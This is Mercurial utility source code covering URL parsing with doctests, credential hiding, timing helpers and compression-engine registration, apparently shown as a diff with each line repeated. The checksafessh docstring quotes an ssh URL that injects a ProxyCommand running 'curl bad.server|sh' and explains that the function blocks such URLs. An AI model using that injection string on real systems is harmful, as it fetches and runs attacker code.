2664 >>> url(br'c:\foo\bar')
2676 >>> url(br'c:\foo\bar')
2665 <url path: 'c:\\foo\\bar'>
2677 <url path: 'c:\\foo\\bar'>
2666 >>> url(br'\\blah\blah\blah')
2678 >>> url(br'\\blah\blah\blah')
2667 <url path: '\\\\blah\\blah\\blah'>
2679 <url path: '\\\\blah\\blah\\blah'>
2668 >>> url(br'\\blah\blah\blah#baz')
2680 >>> url(br'\\blah\blah\blah#baz')
2669 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2681 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2670 >>> url(br'file:///C:\users\me')
2682 >>> url(br'file:///C:\users\me')
2671 <url scheme: 'file', path: 'C:\\users\\me'>
2683 <url scheme: 'file', path: 'C:\\users\\me'>
2672
2684
2673 Authentication credentials:
2685 Authentication credentials:
2674
2686
2675 >>> url(b'ssh://joe:xyz@x/repo')
2687 >>> url(b'ssh://joe:xyz@x/repo')
2676 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2688 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2677 >>> url(b'ssh://joe@x/repo')
2689 >>> url(b'ssh://joe@x/repo')
2678 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2690 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2679
2691
2680 Query strings and fragments:
2692 Query strings and fragments:
2681
2693
2682 >>> url(b'http://host/a?b#c')
2694 >>> url(b'http://host/a?b#c')
2683 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2695 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2684 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2696 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2685 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2697 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2686
2698
2687 Empty path:
2699 Empty path:
2688
2700
2689 >>> url(b'')
2701 >>> url(b'')
2690 <url path: ''>
2702 <url path: ''>
2691 >>> url(b'#a')
2703 >>> url(b'#a')
2692 <url path: '', fragment: 'a'>
2704 <url path: '', fragment: 'a'>
2693 >>> url(b'http://host/')
2705 >>> url(b'http://host/')
2694 <url scheme: 'http', host: 'host', path: ''>
2706 <url scheme: 'http', host: 'host', path: ''>
2695 >>> url(b'http://host/#a')
2707 >>> url(b'http://host/#a')
2696 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2708 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2697
2709
2698 Only scheme:
2710 Only scheme:
2699
2711
2700 >>> url(b'http:')
2712 >>> url(b'http:')
2701 <url scheme: 'http'>
2713 <url scheme: 'http'>
2702 """
2714 """
2703
2715
2704 _safechars = "!~*'()+"
2716 _safechars = "!~*'()+"
2705 _safepchars = "/!~*'()+:\\"
2717 _safepchars = "/!~*'()+:\\"
2706 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2718 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2707
2719
2708 def __init__(self, path, parsequery=True, parsefragment=True):
2720 def __init__(self, path, parsequery=True, parsefragment=True):
2709 # We slowly chomp away at path until we have only the path left
2721 # We slowly chomp away at path until we have only the path left
2710 self.scheme = self.user = self.passwd = self.host = None
2722 self.scheme = self.user = self.passwd = self.host = None
2711 self.port = self.path = self.query = self.fragment = None
2723 self.port = self.path = self.query = self.fragment = None
2712 self._localpath = True
2724 self._localpath = True
2713 self._hostport = ''
2725 self._hostport = ''
2714 self._origpath = path
2726 self._origpath = path
2715
2727
2716 if parsefragment and '#' in path:
2728 if parsefragment and '#' in path:
2717 path, self.fragment = path.split('#', 1)
2729 path, self.fragment = path.split('#', 1)
2718
2730
2719 # special case for Windows drive letters and UNC paths
2731 # special case for Windows drive letters and UNC paths
2720 if hasdriveletter(path) or path.startswith('\\\\'):
2732 if hasdriveletter(path) or path.startswith('\\\\'):
2721 self.path = path
2733 self.path = path
2722 return
2734 return
2723
2735
2724 # For compatibility reasons, we can't handle bundle paths as
2736 # For compatibility reasons, we can't handle bundle paths as
2725 # normal URLS
2737 # normal URLS
2726 if path.startswith('bundle:'):
2738 if path.startswith('bundle:'):
2727 self.scheme = 'bundle'
2739 self.scheme = 'bundle'
2728 path = path[7:]
2740 path = path[7:]
2729 if path.startswith('//'):
2741 if path.startswith('//'):
2730 path = path[2:]
2742 path = path[2:]
2731 self.path = path
2743 self.path = path
2732 return
2744 return
2733
2745
2734 if self._matchscheme(path):
2746 if self._matchscheme(path):
2735 parts = path.split(':', 1)
2747 parts = path.split(':', 1)
2736 if parts[0]:
2748 if parts[0]:
2737 self.scheme, path = parts
2749 self.scheme, path = parts
2738 self._localpath = False
2750 self._localpath = False
2739
2751
2740 if not path:
2752 if not path:
2741 path = None
2753 path = None
2742 if self._localpath:
2754 if self._localpath:
2743 self.path = ''
2755 self.path = ''
2744 return
2756 return
2745 else:
2757 else:
2746 if self._localpath:
2758 if self._localpath:
2747 self.path = path
2759 self.path = path
2748 return
2760 return
2749
2761
2750 if parsequery and '?' in path:
2762 if parsequery and '?' in path:
2751 path, self.query = path.split('?', 1)
2763 path, self.query = path.split('?', 1)
2752 if not path:
2764 if not path:
2753 path = None
2765 path = None
2754 if not self.query:
2766 if not self.query:
2755 self.query = None
2767 self.query = None
2756
2768
2757 # // is required to specify a host/authority
2769 # // is required to specify a host/authority
2758 if path and path.startswith('//'):
2770 if path and path.startswith('//'):
2759 parts = path[2:].split('/', 1)
2771 parts = path[2:].split('/', 1)
2760 if len(parts) > 1:
2772 if len(parts) > 1:
2761 self.host, path = parts
2773 self.host, path = parts
2762 else:
2774 else:
2763 self.host = parts[0]
2775 self.host = parts[0]
2764 path = None
2776 path = None
2765 if not self.host:
2777 if not self.host:
2766 self.host = None
2778 self.host = None
2767 # path of file:///d is /d
2779 # path of file:///d is /d
2768 # path of file:///d:/ is d:/, not /d:/
2780 # path of file:///d:/ is d:/, not /d:/
2769 if path and not hasdriveletter(path):
2781 if path and not hasdriveletter(path):
2770 path = '/' + path
2782 path = '/' + path
2771
2783
2772 if self.host and '@' in self.host:
2784 if self.host and '@' in self.host:
2773 self.user, self.host = self.host.rsplit('@', 1)
2785 self.user, self.host = self.host.rsplit('@', 1)
2774 if ':' in self.user:
2786 if ':' in self.user:
2775 self.user, self.passwd = self.user.split(':', 1)
2787 self.user, self.passwd = self.user.split(':', 1)
2776 if not self.host:
2788 if not self.host:
2777 self.host = None
2789 self.host = None
2778
2790
2779 # Don't split on colons in IPv6 addresses without ports
2791 # Don't split on colons in IPv6 addresses without ports
2780 if (self.host and ':' in self.host and
2792 if (self.host and ':' in self.host and
2781 not (self.host.startswith('[') and self.host.endswith(']'))):
2793 not (self.host.startswith('[') and self.host.endswith(']'))):
2782 self._hostport = self.host
2794 self._hostport = self.host
2783 self.host, self.port = self.host.rsplit(':', 1)
2795 self.host, self.port = self.host.rsplit(':', 1)
2784 if not self.host:
2796 if not self.host:
2785 self.host = None
2797 self.host = None
2786
2798
2787 if (self.host and self.scheme == 'file' and
2799 if (self.host and self.scheme == 'file' and
2788 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2800 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2789 raise Abort(_('file:// URLs can only refer to localhost'))
2801 raise Abort(_('file:// URLs can only refer to localhost'))
2790
2802
2791 self.path = path
2803 self.path = path
2792
2804
2793 # leave the query string escaped
2805 # leave the query string escaped
2794 for a in ('user', 'passwd', 'host', 'port',
2806 for a in ('user', 'passwd', 'host', 'port',
2795 'path', 'fragment'):
2807 'path', 'fragment'):
2796 v = getattr(self, a)
2808 v = getattr(self, a)
2797 if v is not None:
2809 if v is not None:
2798 setattr(self, a, urlreq.unquote(v))
2810 setattr(self, a, urlreq.unquote(v))
2799
2811
2800 @encoding.strmethod
2812 @encoding.strmethod
2801 def __repr__(self):
2813 def __repr__(self):
2802 attrs = []
2814 attrs = []
2803 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2815 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2804 'query', 'fragment'):
2816 'query', 'fragment'):
2805 v = getattr(self, a)
2817 v = getattr(self, a)
2806 if v is not None:
2818 if v is not None:
2807 attrs.append('%s: %r' % (a, v))
2819 attrs.append('%s: %r' % (a, v))
2808 return '<url %s>' % ', '.join(attrs)
2820 return '<url %s>' % ', '.join(attrs)
2809
2821
2810 def __bytes__(self):
2822 def __bytes__(self):
2811 r"""Join the URL's components back into a URL string.
2823 r"""Join the URL's components back into a URL string.
2812
2824
2813 Examples:
2825 Examples:
2814
2826
2815 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2827 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2816 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2828 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2817 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2829 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2818 'http://user:pw@host:80/?foo=bar&baz=42'
2830 'http://user:pw@host:80/?foo=bar&baz=42'
2819 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2831 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2820 'http://user:pw@host:80/?foo=bar%3dbaz'
2832 'http://user:pw@host:80/?foo=bar%3dbaz'
2821 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2833 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2822 'ssh://user:pw@[::1]:2200//home/joe#'
2834 'ssh://user:pw@[::1]:2200//home/joe#'
2823 >>> bytes(url(b'http://localhost:80//'))
2835 >>> bytes(url(b'http://localhost:80//'))
2824 'http://localhost:80//'
2836 'http://localhost:80//'
2825 >>> bytes(url(b'http://localhost:80/'))
2837 >>> bytes(url(b'http://localhost:80/'))
2826 'http://localhost:80/'
2838 'http://localhost:80/'
2827 >>> bytes(url(b'http://localhost:80'))
2839 >>> bytes(url(b'http://localhost:80'))
2828 'http://localhost:80/'
2840 'http://localhost:80/'
2829 >>> bytes(url(b'bundle:foo'))
2841 >>> bytes(url(b'bundle:foo'))
2830 'bundle:foo'
2842 'bundle:foo'
2831 >>> bytes(url(b'bundle://../foo'))
2843 >>> bytes(url(b'bundle://../foo'))
2832 'bundle:../foo'
2844 'bundle:../foo'
2833 >>> bytes(url(b'path'))
2845 >>> bytes(url(b'path'))
2834 'path'
2846 'path'
2835 >>> bytes(url(b'file:///tmp/foo/bar'))
2847 >>> bytes(url(b'file:///tmp/foo/bar'))
2836 'file:///tmp/foo/bar'
2848 'file:///tmp/foo/bar'
2837 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2849 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2838 'file:///c:/tmp/foo/bar'
2850 'file:///c:/tmp/foo/bar'
2839 >>> print(url(br'bundle:foo\bar'))
2851 >>> print(url(br'bundle:foo\bar'))
2840 bundle:foo\bar
2852 bundle:foo\bar
2841 >>> print(url(br'file:///D:\data\hg'))
2853 >>> print(url(br'file:///D:\data\hg'))
2842 file:///D:\data\hg
2854 file:///D:\data\hg
2843 """
2855 """
2844 if self._localpath:
2856 if self._localpath:
2845 s = self.path
2857 s = self.path
2846 if self.scheme == 'bundle':
2858 if self.scheme == 'bundle':
2847 s = 'bundle:' + s
2859 s = 'bundle:' + s
2848 if self.fragment:
2860 if self.fragment:
2849 s += '#' + self.fragment
2861 s += '#' + self.fragment
2850 return s
2862 return s
2851
2863
2852 s = self.scheme + ':'
2864 s = self.scheme + ':'
2853 if self.user or self.passwd or self.host:
2865 if self.user or self.passwd or self.host:
2854 s += '//'
2866 s += '//'
2855 elif self.scheme and (not self.path or self.path.startswith('/')
2867 elif self.scheme and (not self.path or self.path.startswith('/')
2856 or hasdriveletter(self.path)):
2868 or hasdriveletter(self.path)):
2857 s += '//'
2869 s += '//'
2858 if hasdriveletter(self.path):
2870 if hasdriveletter(self.path):
2859 s += '/'
2871 s += '/'
2860 if self.user:
2872 if self.user:
2861 s += urlreq.quote(self.user, safe=self._safechars)
2873 s += urlreq.quote(self.user, safe=self._safechars)
2862 if self.passwd:
2874 if self.passwd:
2863 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2875 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2864 if self.user or self.passwd:
2876 if self.user or self.passwd:
2865 s += '@'
2877 s += '@'
2866 if self.host:
2878 if self.host:
2867 if not (self.host.startswith('[') and self.host.endswith(']')):
2879 if not (self.host.startswith('[') and self.host.endswith(']')):
2868 s += urlreq.quote(self.host)
2880 s += urlreq.quote(self.host)
2869 else:
2881 else:
2870 s += self.host
2882 s += self.host
2871 if self.port:
2883 if self.port:
2872 s += ':' + urlreq.quote(self.port)
2884 s += ':' + urlreq.quote(self.port)
2873 if self.host:
2885 if self.host:
2874 s += '/'
2886 s += '/'
2875 if self.path:
2887 if self.path:
2876 # TODO: similar to the query string, we should not unescape the
2888 # TODO: similar to the query string, we should not unescape the
2877 # path when we store it, the path might contain '%2f' = '/',
2889 # path when we store it, the path might contain '%2f' = '/',
2878 # which we should *not* escape.
2890 # which we should *not* escape.
2879 s += urlreq.quote(self.path, safe=self._safepchars)
2891 s += urlreq.quote(self.path, safe=self._safepchars)
2880 if self.query:
2892 if self.query:
2881 # we store the query in escaped form.
2893 # we store the query in escaped form.
2882 s += '?' + self.query
2894 s += '?' + self.query
2883 if self.fragment is not None:
2895 if self.fragment is not None:
2884 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2896 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2885 return s
2897 return s
2886
2898
2887 __str__ = encoding.strmethod(__bytes__)
2899 __str__ = encoding.strmethod(__bytes__)
2888
2900
2889 def authinfo(self):
2901 def authinfo(self):
2890 user, passwd = self.user, self.passwd
2902 user, passwd = self.user, self.passwd
2891 try:
2903 try:
2892 self.user, self.passwd = None, None
2904 self.user, self.passwd = None, None
2893 s = bytes(self)
2905 s = bytes(self)
2894 finally:
2906 finally:
2895 self.user, self.passwd = user, passwd
2907 self.user, self.passwd = user, passwd
2896 if not self.user:
2908 if not self.user:
2897 return (s, None)
2909 return (s, None)
2898 # authinfo[1] is passed to urllib2 password manager, and its
2910 # authinfo[1] is passed to urllib2 password manager, and its
2899 # URIs must not contain credentials. The host is passed in the
2911 # URIs must not contain credentials. The host is passed in the
2900 # URIs list because Python < 2.4.3 uses only that to search for
2912 # URIs list because Python < 2.4.3 uses only that to search for
2901 # a password.
2913 # a password.
2902 return (s, (None, (s, self.host),
2914 return (s, (None, (s, self.host),
2903 self.user, self.passwd or ''))
2915 self.user, self.passwd or ''))
2904
2916
2905 def isabs(self):
2917 def isabs(self):
2906 if self.scheme and self.scheme != 'file':
2918 if self.scheme and self.scheme != 'file':
2907 return True # remote URL
2919 return True # remote URL
2908 if hasdriveletter(self.path):
2920 if hasdriveletter(self.path):
2909 return True # absolute for our purposes - can't be joined()
2921 return True # absolute for our purposes - can't be joined()
2910 if self.path.startswith(br'\\'):
2922 if self.path.startswith(br'\\'):
2911 return True # Windows UNC path
2923 return True # Windows UNC path
2912 if self.path.startswith('/'):
2924 if self.path.startswith('/'):
2913 return True # POSIX-style
2925 return True # POSIX-style
2914 return False
2926 return False
2915
2927
2916 def localpath(self):
2928 def localpath(self):
2917 if self.scheme == 'file' or self.scheme == 'bundle':
2929 if self.scheme == 'file' or self.scheme == 'bundle':
2918 path = self.path or '/'
2930 path = self.path or '/'
2919 # For Windows, we need to promote hosts containing drive
2931 # For Windows, we need to promote hosts containing drive
2920 # letters to paths with drive letters.
2932 # letters to paths with drive letters.
2921 if hasdriveletter(self._hostport):
2933 if hasdriveletter(self._hostport):
2922 path = self._hostport + '/' + self.path
2934 path = self._hostport + '/' + self.path
2923 elif (self.host is not None and self.path
2935 elif (self.host is not None and self.path
2924 and not hasdriveletter(path)):
2936 and not hasdriveletter(path)):
2925 path = '/' + path
2937 path = '/' + path
2926 return path
2938 return path
2927 return self._origpath
2939 return self._origpath
2928
2940
2929 def islocal(self):
2941 def islocal(self):
2930 '''whether localpath will return something that posixfile can open'''
2942 '''whether localpath will return something that posixfile can open'''
2931 return (not self.scheme or self.scheme == 'file'
2943 return (not self.scheme or self.scheme == 'file'
2932 or self.scheme == 'bundle')
2944 or self.scheme == 'bundle')
2933
2945
2934 def hasscheme(path):
2946 def hasscheme(path):
2935 return bool(url(path).scheme)
2947 return bool(url(path).scheme)
2936
2948
2937 def hasdriveletter(path):
2949 def hasdriveletter(path):
2938 return path and path[1:2] == ':' and path[0:1].isalpha()
2950 return path and path[1:2] == ':' and path[0:1].isalpha()
2939
2951
2940 def urllocalpath(path):
2952 def urllocalpath(path):
2941 return url(path, parsequery=False, parsefragment=False).localpath()
2953 return url(path, parsequery=False, parsefragment=False).localpath()
2942
2954
2943 def checksafessh(path):
2955 def checksafessh(path):
2944 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2956 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2945
2957
2946 This is a sanity check for ssh urls. ssh will parse the first item as
2958 This is a sanity check for ssh urls. ssh will parse the first item as
2947 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2959 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2948 Let's prevent these potentially exploited urls entirely and warn the
2960 Let's prevent these potentially exploited urls entirely and warn the
2949 user.
2961 user.
2950
2962
2951 Raises an error.Abort when the url is unsafe.
2963 Raises an error.Abort when the url is unsafe.
2952 """
2964 """
2953 path = urlreq.unquote(path)
2965 path = urlreq.unquote(path)
2954 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2966 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2955 raise error.Abort(_('potentially unsafe url: %r') %
2967 raise error.Abort(_('potentially unsafe url: %r') %
2956 (path,))
2968 (path,))
2957
2969
2958 def hidepassword(u):
2970 def hidepassword(u):
2959 '''hide user credential in a url string'''
2971 '''hide user credential in a url string'''
2960 u = url(u)
2972 u = url(u)
2961 if u.passwd:
2973 if u.passwd:
2962 u.passwd = '***'
2974 u.passwd = '***'
2963 return bytes(u)
2975 return bytes(u)
2964
2976
2965 def removeauth(u):
2977 def removeauth(u):
2966 '''remove all authentication information from a url string'''
2978 '''remove all authentication information from a url string'''
2967 u = url(u)
2979 u = url(u)
2968 u.user = u.passwd = None
2980 u.user = u.passwd = None
2969 return str(u)
2981 return str(u)
2970
2982
2971 timecount = unitcountfn(
2983 timecount = unitcountfn(
2972 (1, 1e3, _('%.0f s')),
2984 (1, 1e3, _('%.0f s')),
2973 (100, 1, _('%.1f s')),
2985 (100, 1, _('%.1f s')),
2974 (10, 1, _('%.2f s')),
2986 (10, 1, _('%.2f s')),
2975 (1, 1, _('%.3f s')),
2987 (1, 1, _('%.3f s')),
2976 (100, 0.001, _('%.1f ms')),
2988 (100, 0.001, _('%.1f ms')),
2977 (10, 0.001, _('%.2f ms')),
2989 (10, 0.001, _('%.2f ms')),
2978 (1, 0.001, _('%.3f ms')),
2990 (1, 0.001, _('%.3f ms')),
2979 (100, 0.000001, _('%.1f us')),
2991 (100, 0.000001, _('%.1f us')),
2980 (10, 0.000001, _('%.2f us')),
2992 (10, 0.000001, _('%.2f us')),
2981 (1, 0.000001, _('%.3f us')),
2993 (1, 0.000001, _('%.3f us')),
2982 (100, 0.000000001, _('%.1f ns')),
2994 (100, 0.000000001, _('%.1f ns')),
2983 (10, 0.000000001, _('%.2f ns')),
2995 (10, 0.000000001, _('%.2f ns')),
2984 (1, 0.000000001, _('%.3f ns')),
2996 (1, 0.000000001, _('%.3f ns')),
2985 )
2997 )
2986
2998
2987 _timenesting = [0]
2999 _timenesting = [0]
2988
3000
2989 def timed(func):
3001 def timed(func):
2990 '''Report the execution time of a function call to stderr.
3002 '''Report the execution time of a function call to stderr.
2991
3003
2992 During development, use as a decorator when you need to measure
3004 During development, use as a decorator when you need to measure
2993 the cost of a function, e.g. as follows:
3005 the cost of a function, e.g. as follows:
2994
3006
2995 @util.timed
3007 @util.timed
2996 def foo(a, b, c):
3008 def foo(a, b, c):
2997 pass
3009 pass
2998 '''
3010 '''
2999
3011
3000 def wrapper(*args, **kwargs):
3012 def wrapper(*args, **kwargs):
3001 start = timer()
3013 start = timer()
3002 indent = 2
3014 indent = 2
3003 _timenesting[0] += indent
3015 _timenesting[0] += indent
3004 try:
3016 try:
3005 return func(*args, **kwargs)
3017 return func(*args, **kwargs)
3006 finally:
3018 finally:
3007 elapsed = timer() - start
3019 elapsed = timer() - start
3008 _timenesting[0] -= indent
3020 _timenesting[0] -= indent
3009 stderr.write('%s%s: %s\n' %
3021 stderr.write('%s%s: %s\n' %
3010 (' ' * _timenesting[0], func.__name__,
3022 (' ' * _timenesting[0], func.__name__,
3011 timecount(elapsed)))
3023 timecount(elapsed)))
3012 return wrapper
3024 return wrapper
3013
3025
3014 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3026 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3015 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3027 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3016
3028
3017 def sizetoint(s):
3029 def sizetoint(s):
3018 '''Convert a space specifier to a byte count.
3030 '''Convert a space specifier to a byte count.
3019
3031
3020 >>> sizetoint(b'30')
3032 >>> sizetoint(b'30')
3021 30
3033 30
3022 >>> sizetoint(b'2.2kb')
3034 >>> sizetoint(b'2.2kb')
3023 2252
3035 2252
3024 >>> sizetoint(b'6M')
3036 >>> sizetoint(b'6M')
3025 6291456
3037 6291456
3026 '''
3038 '''
3027 t = s.strip().lower()
3039 t = s.strip().lower()
3028 try:
3040 try:
3029 for k, u in _sizeunits:
3041 for k, u in _sizeunits:
3030 if t.endswith(k):
3042 if t.endswith(k):
3031 return int(float(t[:-len(k)]) * u)
3043 return int(float(t[:-len(k)]) * u)
3032 return int(t)
3044 return int(t)
3033 except ValueError:
3045 except ValueError:
3034 raise error.ParseError(_("couldn't parse size: %s") % s)
3046 raise error.ParseError(_("couldn't parse size: %s") % s)
3035
3047
3036 class hooks(object):
3048 class hooks(object):
3037 '''A collection of hook functions that can be used to extend a
3049 '''A collection of hook functions that can be used to extend a
3038 function's behavior. Hooks are called in lexicographic order,
3050 function's behavior. Hooks are called in lexicographic order,
3039 based on the names of their sources.'''
3051 based on the names of their sources.'''
3040
3052
3041 def __init__(self):
3053 def __init__(self):
3042 self._hooks = []
3054 self._hooks = []
3043
3055
3044 def add(self, source, hook):
3056 def add(self, source, hook):
3045 self._hooks.append((source, hook))
3057 self._hooks.append((source, hook))
3046
3058
3047 def __call__(self, *args):
3059 def __call__(self, *args):
3048 self._hooks.sort(key=lambda x: x[0])
3060 self._hooks.sort(key=lambda x: x[0])
3049 results = []
3061 results = []
3050 for source, hook in self._hooks:
3062 for source, hook in self._hooks:
3051 results.append(hook(*args))
3063 results.append(hook(*args))
3052 return results
3064 return results
3053
3065
3054 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
3066 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
3055 '''Yields lines for a nicely formatted stacktrace.
3067 '''Yields lines for a nicely formatted stacktrace.
3056 Skips the 'skip' last entries, then return the last 'depth' entries.
3068 Skips the 'skip' last entries, then return the last 'depth' entries.
3057 Each file+linenumber is formatted according to fileline.
3069 Each file+linenumber is formatted according to fileline.
3058 Each line is formatted according to line.
3070 Each line is formatted according to line.
3059 If line is None, it yields:
3071 If line is None, it yields:
3060 length of longest filepath+line number,
3072 length of longest filepath+line number,
3061 filepath+linenumber,
3073 filepath+linenumber,
3062 function
3074 function
3063
3075
3064 Not be used in production code but very convenient while developing.
3076 Not be used in production code but very convenient while developing.
3065 '''
3077 '''
3066 entries = [(fileline % (fn, ln), func)
3078 entries = [(fileline % (fn, ln), func)
3067 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3079 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3068 ][-depth:]
3080 ][-depth:]
3069 if entries:
3081 if entries:
3070 fnmax = max(len(entry[0]) for entry in entries)
3082 fnmax = max(len(entry[0]) for entry in entries)
3071 for fnln, func in entries:
3083 for fnln, func in entries:
3072 if line is None:
3084 if line is None:
3073 yield (fnmax, fnln, func)
3085 yield (fnmax, fnln, func)
3074 else:
3086 else:
3075 yield line % (fnmax, fnln, func)
3087 yield line % (fnmax, fnln, func)
3076
3088
3077 def debugstacktrace(msg='stacktrace', skip=0,
3089 def debugstacktrace(msg='stacktrace', skip=0,
3078 f=stderr, otherf=stdout, depth=0):
3090 f=stderr, otherf=stdout, depth=0):
3079 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3091 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3080 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3092 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3081 By default it will flush stdout first.
3093 By default it will flush stdout first.
3082 It can be used everywhere and intentionally does not require an ui object.
3094 It can be used everywhere and intentionally does not require an ui object.
3083 Not be used in production code but very convenient while developing.
3095 Not be used in production code but very convenient while developing.
3084 '''
3096 '''
3085 if otherf:
3097 if otherf:
3086 otherf.flush()
3098 otherf.flush()
3087 f.write('%s at:\n' % msg.rstrip())
3099 f.write('%s at:\n' % msg.rstrip())
3088 for line in getstackframes(skip + 1, depth=depth):
3100 for line in getstackframes(skip + 1, depth=depth):
3089 f.write(line)
3101 f.write(line)
3090 f.flush()
3102 f.flush()
3091
3103
3092 class dirs(object):
3104 class dirs(object):
3093 '''a multiset of directory names from a dirstate or manifest'''
3105 '''a multiset of directory names from a dirstate or manifest'''
3094
3106
3095 def __init__(self, map, skip=None):
3107 def __init__(self, map, skip=None):
3096 self._dirs = {}
3108 self._dirs = {}
3097 addpath = self.addpath
3109 addpath = self.addpath
3098 if safehasattr(map, 'iteritems') and skip is not None:
3110 if safehasattr(map, 'iteritems') and skip is not None:
3099 for f, s in map.iteritems():
3111 for f, s in map.iteritems():
3100 if s[0] != skip:
3112 if s[0] != skip:
3101 addpath(f)
3113 addpath(f)
3102 else:
3114 else:
3103 for f in map:
3115 for f in map:
3104 addpath(f)
3116 addpath(f)
3105
3117
3106 def addpath(self, path):
3118 def addpath(self, path):
3107 dirs = self._dirs
3119 dirs = self._dirs
3108 for base in finddirs(path):
3120 for base in finddirs(path):
3109 if base in dirs:
3121 if base in dirs:
3110 dirs[base] += 1
3122 dirs[base] += 1
3111 return
3123 return
3112 dirs[base] = 1
3124 dirs[base] = 1
3113
3125
3114 def delpath(self, path):
3126 def delpath(self, path):
3115 dirs = self._dirs
3127 dirs = self._dirs
3116 for base in finddirs(path):
3128 for base in finddirs(path):
3117 if dirs[base] > 1:
3129 if dirs[base] > 1:
3118 dirs[base] -= 1
3130 dirs[base] -= 1
3119 return
3131 return
3120 del dirs[base]
3132 del dirs[base]
3121
3133
3122 def __iter__(self):
3134 def __iter__(self):
3123 return iter(self._dirs)
3135 return iter(self._dirs)
3124
3136
3125 def __contains__(self, d):
3137 def __contains__(self, d):
3126 return d in self._dirs
3138 return d in self._dirs
3127
3139
3128 if safehasattr(parsers, 'dirs'):
3140 if safehasattr(parsers, 'dirs'):
3129 dirs = parsers.dirs
3141 dirs = parsers.dirs
3130
3142
3131 def finddirs(path):
3143 def finddirs(path):
3132 pos = path.rfind('/')
3144 pos = path.rfind('/')
3133 while pos != -1:
3145 while pos != -1:
3134 yield path[:pos]
3146 yield path[:pos]
3135 pos = path.rfind('/', 0, pos)
3147 pos = path.rfind('/', 0, pos)
3136
3148
3137 # compression code
3149 # compression code
3138
3150
3139 SERVERROLE = 'server'
3151 SERVERROLE = 'server'
3140 CLIENTROLE = 'client'
3152 CLIENTROLE = 'client'
3141
3153
3142 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3154 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3143 (u'name', u'serverpriority',
3155 (u'name', u'serverpriority',
3144 u'clientpriority'))
3156 u'clientpriority'))
3145
3157
3146 class compressormanager(object):
3158 class compressormanager(object):
3147 """Holds registrations of various compression engines.
3159 """Holds registrations of various compression engines.
3148
3160
3149 This class essentially abstracts the differences between compression
3161 This class essentially abstracts the differences between compression
3150 engines to allow new compression formats to be added easily, possibly from
3162 engines to allow new compression formats to be added easily, possibly from
3151 extensions.
3163 extensions.
3152
3164
3153 Compressors are registered against the global instance by calling its
3165 Compressors are registered against the global instance by calling its
3154 ``register()`` method.
3166 ``register()`` method.
3155 """
3167 """
3156 def __init__(self):
3168 def __init__(self):
3157 self._engines = {}
3169 self._engines = {}
3158 # Bundle spec human name to engine name.
3170 # Bundle spec human name to engine name.
3159 self._bundlenames = {}
3171 self._bundlenames = {}
3160 # Internal bundle identifier to engine name.
3172 # Internal bundle identifier to engine name.
3161 self._bundletypes = {}
3173 self._bundletypes = {}
3162 # Revlog header to engine name.
3174 # Revlog header to engine name.
3163 self._revlogheaders = {}
3175 self._revlogheaders = {}
3164 # Wire proto identifier to engine name.
3176 # Wire proto identifier to engine name.
3165 self._wiretypes = {}
3177 self._wiretypes = {}
3166
3178
3167 def __getitem__(self, key):
3179 def __getitem__(self, key):
3168 return self._engines[key]
3180 return self._engines[key]
3169
3181
3170 def __contains__(self, key):
3182 def __contains__(self, key):
3171 return key in self._engines
3183 return key in self._engines
